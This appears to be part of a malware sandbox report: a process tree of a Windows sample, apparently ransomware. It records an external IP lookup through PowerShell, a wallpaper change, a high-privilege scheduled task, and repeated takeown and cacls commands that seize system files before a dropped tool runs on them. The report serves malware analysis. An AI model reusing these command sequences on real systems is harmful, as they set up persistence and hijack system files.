    "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\JjDeQHEq.txt"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3592
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4184
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\zLzXyvi4.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4828
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2476
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\YnGIlPbI.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1120
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\YnGIlPbI.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:2952
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:4016
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:4028
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Vx3ThnGc.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1108
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Vx3ThnGc.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1740
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Ct7Xyoqg.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2732
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\Ct7Xyoqg.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:5044
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1760
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:5084
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:32
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:420
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3752
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "store.db" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3892
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4540
    - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC764.exe
        
        hbFC3HC7.exe -accepteula "store.db" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Sets service image path in registry
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:4564
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:4240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:3164
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    PID:1032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "store.db" -nobanner
    3⤵
    PID:4216
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:2496
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2332
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
  2⤵
  PID:4164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:3620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:1112
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:3664
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4012
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""
  2⤵
  PID:3904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:2820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:1972
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:4252
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4072
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""
  2⤵
  PID:3504
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C
    3⤵
    PID:3212
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner
    3⤵
    PID:3808
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "Workflow.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:4448
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:4480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:2432
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:3872
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:3592
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4092
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Mail\wab.exe""
  2⤵
  PID:1696
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:4576
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1808
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:5020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1156
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4380
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:776
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui""
  2⤵
  PID:3132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2812
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2832
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:676
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:4640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4216
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4404
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4848
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:3276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3896
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1172
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4468
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3416
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3944
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1888
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3948
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2560
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:4488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:940
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1116
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui""
  2⤵
  PID:4500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "BrowserCore.exe.mui" -nobanner
    3⤵
    PID:2432
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "BrowserCore.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4888
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:3472
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4480
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4876
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui""
  2⤵
  PID:1452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2476
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4576
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:2324
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4764
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3900
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:5056
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4572
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4380
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
  2⤵
  PID:3656
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
    3⤵
    PID:284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "manifest.json" -nobanner
    3⤵
    PID:5028
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "manifest.json" -nobanner
      4⤵
      Executes dropped EXE
      PID:1232
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui""
  2⤵
  PID:5088
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:244
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4440
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2584
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2396
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:2332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:2104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    PID:460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:4848
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:1608
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1408
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""
  2⤵
  PID:3004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4464
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:1172
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3584
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4476
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
    hbFC3HC7.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tJjIzvat.bat" "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe""
  2⤵
  PID:4684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe" /E /G Admin:F /C
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\BrowserCore.exe"
    3⤵
    - Modifies file permissions
    PID:4804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c hbFC3HC7.exe -accepteula "BrowserCore.exe" -nobanner
    3⤵
    PID:4400
  - - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
      hbFC3HC7.exe -accepteula "BrowserCore.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4280
- - C:\Users\Admin\AppData\Local\Temp\hbFC3HC7.exe
